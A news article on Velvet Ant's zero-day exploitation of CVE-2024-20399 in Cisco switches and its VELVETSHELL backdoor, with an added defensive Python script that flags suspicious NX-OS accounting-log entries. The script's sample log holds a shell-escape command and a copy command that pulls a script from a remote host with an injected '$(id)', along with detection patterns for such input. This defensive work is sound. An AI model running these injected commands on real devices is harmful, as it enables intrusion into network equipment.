Chinese Hackers Leverage Zero-Day Cisco Switch Flaw for System Control

August 22, 2024

A China-linked threat group tracked as Velvet Ant has been exploiting a recently disclosed vulnerability in Cisco switches, CVE-2024-20399, as a zero-day to gain control of the devices and evade detection. The exploitation was observed earlier this year and let the group deliver custom malware and gain extensive control over the compromised systems, enabling data theft and persistent access.

As cybersecurity firm Sygnia reported, 'The zero-day exploit allows an attacker with valid administrator credentials to the Switch management console to escape the NX-OS command line interface (CLI) and execute arbitrary commands on the Linux underlying operating system.' Velvet Ant was first documented by Sygnia's researchers during a multi-year campaign against an unnamed organization in East Asia, in which the group used outdated F5 BIG-IP appliances as a foothold to maintain persistence in the compromised environment.
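The quoted description makes the practical point: the flaw is post-authentication, so the levers a defender holds are the patch, who holds administrator credentials on the switch, where admin sessions are allowed to originate, and whether CLI activity is being recorded and reviewed. The script below is an added example of that review step, written for this page; it is not Sygnia's or Cisco's code. It triages NX-OS accounting-log-style entries and flags sessions from unexpected accounts or source networks, explicit drops into the underlying Linux shell (`run bash`, `run guestshell`), and CLI arguments carrying shell metacharacters. The line shape (a simplification of `show accounting log` output), the management network, the approved-admin list and every sample entry are constructed for the example. The page gives no exploit syntax, so the metacharacter heuristic is generic command-injection triage, not the specific CVE-2024-20399 trigger.

```python
"""Heuristic triage of NX-OS accounting-log lines for post-authentication CLI abuse.

Added example for this article; not Sygnia's or Cisco's code.

Assumed (simplified) line shape, modelled on `show accounting log` output:
    <timestamp>:type=<update|start|stop>:id=<src_ip>@<tty>:user=<name>:cmd=<text>
"""
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample entries; not taken from any real incident.
SAMPLE_LOG = """\
Mon Jul  1 09:58:10 2024:type=update:id=10.10.0.5@pts/0:user=netops:cmd=show version
Mon Jul  1 09:58:31 2024:type=update:id=10.10.0.5@pts/0:user=netops:cmd=show interface brief
Mon Jul  1 10:02:07 2024:type=update:id=198.51.100.23@pts/1:user=admin:cmd=show version
Mon Jul  1 10:02:19 2024:type=update:id=198.51.100.23@pts/1:user=admin:cmd=run bash
Mon Jul  1 10:02:40 2024:type=update:id=198.51.100.23@pts/1:user=admin:cmd=copy scp://10.9.9.9/x.sh bootflash:x.sh $(id)
Mon Jul  1 10:03:01 2024:type=update:id=198.51.100.23@pts/1:user=admin:cmd=show cdp neighbors
"""

LINE_RE = re.compile(
    r"^(?P<ts>.+?):type=(?P<type>\w+):id=(?P<ip>[^@]+)@(?P<tty>[^:]*)"
    r":user=(?P<user>[^:]+):cmd=(?P<cmd>.*)$"
)

# Tokens that have no business inside an NX-OS CLI argument but mean something to a POSIX
# shell. A single "|" is deliberately excluded: "show run | include ..." is normal CLI use.
SHELL_META_RE = re.compile(r"`|\$\(|\$\{|&&|\|\||\n|\\x")

# Legitimate NX-OS commands that hand the operator a Linux shell; rare enough to review each one.
SHELL_ENTRY_RE = re.compile(r"^\s*run\s+(bash|guestshell)\b")


@dataclass
class Finding:
    line_no: int
    user: str
    src_ip: str
    reason: str
    cmd: str


def parse_line(line: str):
    """Split one accounting-log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify_command(cmd: str):
    """Return a reason if the CLI text looks shell-bound, otherwise None."""
    if SHELL_ENTRY_RE.match(cmd):
        return "explicit drop to underlying Linux shell"
    if SHELL_META_RE.search(cmd):
        return "shell metacharacters inside CLI arguments"
    return None


def _in_any(ip_text: str, nets) -> bool:
    """True if ip_text parses and lies inside one of nets; unparseable sources get reviewed."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(addr in net for net in nets)


def triage(log_text: str,
           mgmt_nets=("10.10.0.0/24",),          # assumed management network
           approved_admins=("netops",)):          # assumed list of sanctioned switch admins
    """Return Findings: one per unexpected session attribute, one per suspicious command."""
    nets = [ipaddress.ip_network(n) for n in mgmt_nets]
    findings = []
    seen_sessions = set()
    for line_no, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        user, ip, cmd = rec["user"], rec["ip"], rec["cmd"]
        # Session-level checks are reported once per (user, source) pair, not per command.
        if (user, ip) not in seen_sessions:
            seen_sessions.add((user, ip))
            if user not in approved_admins:
                findings.append(Finding(line_no, user, ip, "account not on approved switch-admin list", cmd))
            if not _in_any(ip, nets):
                findings.append(Finding(line_no, user, ip, "session from outside management network", cmd))
        reason = classify_command(cmd)
        if reason:
            findings.append(Finding(line_no, user, ip, reason, cmd))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.user}@{f.src_ip}: {f.reason}: {f.cmd}")
```

On the constructed log the two `netops` lines from the management network are silent, while the `admin` session from 198.51.100.23 produces four findings: an unapproved account, an off-network source, an explicit `run bash`, and a `$(...)` in a `copy` argument. The allowlist and network parameters are the part a practitioner must fill in from their own environment; the command heuristics are generic and should be tuned against a baseline of the site's normal CLI usage before being trusted for alerting.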

The group's covert exploitation of CVE-2024-20399 came to light last month, when Cisco released security updates to fix the flaw. What stands out is the group's sophistication and adaptability: it initially compromised new Windows systems, then shifted to legacy Windows servers and finally to network devices to stay unnoticed. Sygnia noted, 'The transition to operating from internal network devices marks yet another escalation in the evasion techniques used in order to ensure the continuation of the espionage campaign.'

The most recent attack chain involves breaking into a Cisco switch via CVE-2024-20399 and performing reconnaissance on it, pivoting to additional network devices, and finally running a backdoor binary through a malicious script. The payload, dubbed VELVETSHELL, is a hybrid of two open-source tools, the Unix backdoor Tiny SHell and the proxy utility 3proxy, and can execute arbitrary commands, download and upload files, and set up tunnels to proxy network traffic.

Sygnia commented on the threat group's methods, stating, 'The modus operandi of "Velvet Ant" highlights risks and questions regarding third-party appliances and applications that organizations onboard. Due to the "black box" nature of many appliances, each piece of hardware or software has the potential to turn into the attack surface that an adversary is able to exploit.'
